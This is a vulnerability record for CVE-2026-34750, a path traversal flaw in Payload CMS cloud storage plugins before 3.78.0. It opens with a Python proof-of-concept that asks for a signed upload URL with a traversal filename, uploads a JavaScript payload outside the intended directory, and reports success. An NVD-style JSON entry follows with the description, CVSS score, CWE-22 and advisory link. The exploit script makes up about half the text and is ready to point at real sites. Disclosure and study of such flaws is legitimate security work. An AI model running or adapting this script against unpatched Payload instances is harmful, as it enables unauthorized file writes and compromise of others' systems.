CVE-2026-34750

import requests # This POC demonstrates the concept of the vulnerability. # It attempts to upload a file with a path traversal payload. # Target Payload CMS instance with vulnerable storage plugin. target_url = "https://example.com/api/upload/generate-upload-url" # Attacker controlled filename with path traversal malicious_filename = "../../../../../tmp/malicious_payload.js" payload_content = "console.log('Vulnerable to CVE-2026-34750');" # Headers simulating a low-privilege authenticated user headers = { "Authorization": "Bearer <LOW_PRIV_TOKEN>", "Content-Type": "application/json" } # Step 1: Request the signed URL (hypothetical endpoint) data = { "filename": malicious_filename, "mimeType": "application/javascript" } try: # Response usually contains a 'url' and 'fields' for S3 or similar response = requests.post(target_url, json=data, headers=headers) if response.status_code == 200: upload_data = response.json() print("[+] Signed URL obtained successfully.") # Step 2: Upload the file using the signed URL # Note: The actual upload mechanism depends on the cloud provider (S3 form POST, PUT, etc.) # Here we simulate a PUT request common in S3 uploads upload_url = upload_data.get('url') upload_response = requests.put(upload_url, data=payload_content) if upload_response.status_code == 200: print(f"[+] Exploit successful! File '{malicious_filename}' uploaded outside intended directory.") else: print(f"[-] Upload failed. Status: {upload_response.status_code}") else: print(f"[-] Failed to get signed URL. Status: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2026-34750", "sourceIdentifier": "[email protected]", "published": "2026-04-01T20:16:27.337", "lastModified": "2026-04-13T19:15:38.330", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Payload is a free and open source headless content management system. Prior to version 3.78.0 in @payloadcms/storage-azure, @payloadcms/storage-gcs, @payloadcms/storage-r2, and @payloadcms/storage-s3, the client-upload signed-URL endpoints for S3, GCS, Azure, and R2 did not properly sanitize filenames. An attacker could craft filenames to escape the intended storage location. This issue has been patched in version 3.78.0 for @payloadcms/storage-azure, @payloadcms/storage-gcs, @payloadcms/storage-r2, and @payloadcms/storage-s3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.78.0", "matchCriteriaId": "225E9788-C205-479C-B3EE-7A57A468929F"}]}]}], "references": [{"url": "https://github.com/payloadcms/payload/security/advisories/GHSA-frq9-7j6g-v74x", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}